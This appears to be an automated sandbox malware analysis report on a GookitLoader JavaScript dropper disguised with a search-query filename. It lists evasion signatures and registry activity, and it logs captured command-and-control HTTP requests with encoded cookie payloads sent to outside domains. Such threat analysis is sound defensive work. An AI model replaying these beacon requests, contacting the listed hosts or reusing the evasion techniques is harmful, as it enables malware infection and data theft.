Windows Analysis Report
is it legal to kill a peacock in california 93889.js

Overview

General Information

Sample name: is it legal to kill a peacock in california 93889.js
Analysis ID: 1500124
MD5: 42ffe54cde30c6d3babb008f491597ad
SHA1: 7bdbe6b90df3e48cadbd494f0d2ff24fc32b287d
SHA256: 5bf0940ddb8bc56d5322f879b64c0565f66a3ed6bf4dbdadc3e5f01236e08e52
Infos:

Detection

GookitLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected GookitLoader
Loading BitLocker PowerShell Module
Potential evasive JS / VBS script found (domain check)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
